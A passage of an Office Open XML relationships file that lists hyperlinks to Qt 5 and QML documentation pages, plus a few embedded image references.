Target="http://doc.qt.io/qt-5/qcolordialog.html" TargetMode="External"/><Relationship Id="rId2429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertychanges.html" TargetMode="External"/><Relationship Id="rId2636" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-delegatemodel.html" TargetMode="External"/><Relationship Id="rId2843" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgdynamictexture.html" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qtobject.html" TargetMode="External"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-layouts.html" TargetMode="External"/><Relationship Id="rId608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-radialblur.html" TargetMode="External"/><Relationship Id="rId815" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-categoryaxis3d.html" TargetMode="External"/><Relationship Id="rId1238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-rendertargetselector.html" TargetMode="External"/><Relationship Id="rId1445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwayland-compositor-waylandquickitem.html" TargetMode="External"/><Relationship Id="rId1652" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmllistmodel.html" TargetMode="External"/><Relationship Id="rId1000" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-inputsequence.html" TargetMode="External"/><Relationship Id="rId1305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-spotlight.html" TargetMode="External"/><Relationship Id="rId1957" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId2703" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId2910" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-variant.html" TargetMode="External"/><Relationship Id="rId1817" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qt-labs-settings-qmlmodule.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/resources.html" TargetMode="External"/><Relationship Id="rId2079" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffectsource.html" TargetMode="External"/><Relationship Id="rId3032" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId2286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId2493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-animation.html" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId672" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-workerscript.html" TargetMode="External"/><Relationship Id="rId1095" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-menustyle.html" TargetMode="External"/><Relationship Id="rId2146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterial.html" TargetMode="External"/><Relationship Id="rId2353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtwidgets-index.html" TargetMode="External"/><Relationship Id="rId2560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2798" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-topic.html" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-imports.html" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlextensionplugin.html" TargetMode="External"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-styling.html" TargetMode="External"/><Relationship Id="rId977" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-hcandlestickmodelmapper.html" TargetMode="External"/><Relationship Id="rId1162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-pickevent.html" TargetMode="External"/><Relationship Id="rId2006" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph-renderer.html" TargetMode="External"/><Relationship Id="rId2213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId2420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-statechangescript.html" TargetMode="External"/><Relationship Id="rId2658" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-textfield.html" TargetMode="External"/><Relationship Id="rId2865" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId837" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-colormask.html" TargetMode="External"/><Relationship Id="rId1022" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-keyboardcolumn.html" TargetMode="External"/><Relationship Id="rId1467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-wheelevent.html" TargetMode="External"/><Relationship Id="rId1674" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1881" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-pointdirection.html" TargetMode="External"/><Relationship Id="rId2518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId2725" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-enumeration.html" TargetMode="External"/><Relationship Id="rId2932" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/metaobjects.html" TargetMode="External"/><Relationship Id="rId904" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-droparea.html" TargetMode="External"/><Relationship Id="rId1327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-stencilmask.html" TargetMode="External"/><Relationship Id="rId1534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1741" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1979" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgopacitynode.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-javascript-topic.html" TargetMode="External"/><Relationship Id="rId1601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-window.html" TargetMode="External"/><Relationship Id="rId1839" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-customparticle.html" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId1906" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId694" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-abstractaxis.html" TargetMode="External"/><Relationship Id="rId2070" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/openglunderqml-example.jpg" TargetMode="External"/><Relationship Id="rId2375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-basics.html" TargetMode="External"/><Relationship Id="rId999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-inputpanel.html" TargetMode="External"/><Relationship Id="rId1184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-pointdirection.html" TargetMode="External"/><Relationship Id="rId2028" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickframebufferobject.html" TargetMode="External"/><Relationship Id="rId2582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2887" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qpainter.html" TargetMode="External"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlapplicationengine.html" TargetMode="External"/><Relationship Id="rId761" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtbluetooth-bluetoothdiscoverymodel.html" TargetMode="External"/><Relationship Id="rId859" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-control.html" TargetMode="External"/><Relationship Id="rId1391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-toolseparator.html" TargetMode="External"/><Relationship Id="rId1489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-loader.html" TargetMode="External"/><Relationship Id="rId1696" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtwidgets-animation-states-example.html" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtdoc/qml-codingconventions.html" TargetMode="External"/><Relationship Id="rId621" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qvariant.html" TargetMode="External"/><Relationship Id="rId1044" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-light3d.html" TargetMode="External"/><Relationship Id="rId1251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-routesegment.html" TargetMode="External"/><Relationship Id="rId1349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-tabbar.html" TargetMode="External"/><Relationship Id="rId2302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId2747" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId2954" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmlreference.html" TargetMode="External"/><Relationship Id="rId719" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-ambientlightsensor.html" TargetMode="External"/><Relationship Id="rId926" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-firstpersoncameracontroller.html" TargetMode="External"/><Relationship Id="rId1111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtnfc-ndeftextrecord.html" TargetMode="External"/><Relationship Id="rId1556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1763" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId1970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qstringlist.html" TargetMode="External"/><Relationship Id="rId2814" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickrendercontrol.html" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcomponent.html" TargetMode="External"/><Relationship Id="rId1209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qtobject.html" TargetMode="External"/><Relationship Id="rId1416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-uniformanimator.html" TargetMode="External"/><Relationship Id="rId1623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1830" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId1928" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qttest-qmlmodule.html" TargetMode="External"/><Relationship Id="rId2092" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-behavior.html" TargetMode="External"/><Relationship Id="rId3003" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-performance.html" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-size.html" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId783" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-camera.html" TargetMode="External"/><Relationship Id="rId990" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-image.html" TargetMode="External"/><Relationship Id="rId2257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-focusscope.html" TargetMode="External"/><Relationship Id="rId2464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parentanimation.html" TargetMode="External"/><Relationship Id="rId2671" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-repeater.html" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/whatsnew50.html" TargetMode="External"/><Relationship Id="rId643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId1066" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-mapitemview.html" TargetMode="External"/><Relationship Id="rId1273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-sensorgesture.html" TargetMode="External"/><Relationship Id="rId1480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/newclasses58.html" TargetMode="External"/><Relationship Id="rId2117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2769" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2976" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquicktemplates2-index.html" TargetMode="External"/><Relationship Id="rId850" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-conemesh.html" TargetMode="External"/><Relationship Id="rId948" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-gaugestyle.html" TargetMode="External"/><Relationship Id="rId1133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-page.html" TargetMode="External"/><Relationship Id="rId1578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-effects-topic.html" TargetMode="External"/><Relationship Id="rId1785" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-colordialog.html" TargetMode="External"/><Relationship Id="rId1992" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterialshader.html" TargetMode="External"/><Relationship Id="rId2531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sprite.html" TargetMode="External"/><Relationship Id="rId2629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2836" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgrendernode.html" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId710" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-actioninput.html" TargetMode="External"/><Relationship Id="rId808" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3dtextureprovider.html" TargetMode="External"/><Relationship Id="rId1340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-swipeview.html" TargetMode="External"/><Relationship Id="rId1438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-visualitemmodel.html" TargetMode="External"/><Relationship Id="rId1645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyanimation.html" TargetMode="External"/><Relationship Id="rId1852" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-system-content-timedgroupchanges-qml.html" TargetMode="External"/><Relationship Id="rId2903" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId1505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId1712" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId2181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId3025" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qtcreator/images/qtquick-debugging-settings.png" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-lineargradient.html" TargetMode="External"/><Relationship Id="rId2041" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-openglunderqml-example.html" TargetMode="External"/><Relationship Id="rId2279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId2486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sequentialanimation.html" TargetMode="External"/><Relationship Id="rId2693" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-animatedimage.html" TargetMode="External"/><Relationship Id="rId665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId872" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-date.html" TargetMode="External"/><Relationship Id="rId1088" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-menuitem.html" TargetMode="External"/><Relationship Id="rId1295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-soundeffect.html" TargetMode="External"/><Relationship Id="rId2139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qguiapplication.html" TargetMode="External"/><Relationship Id="rId2346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 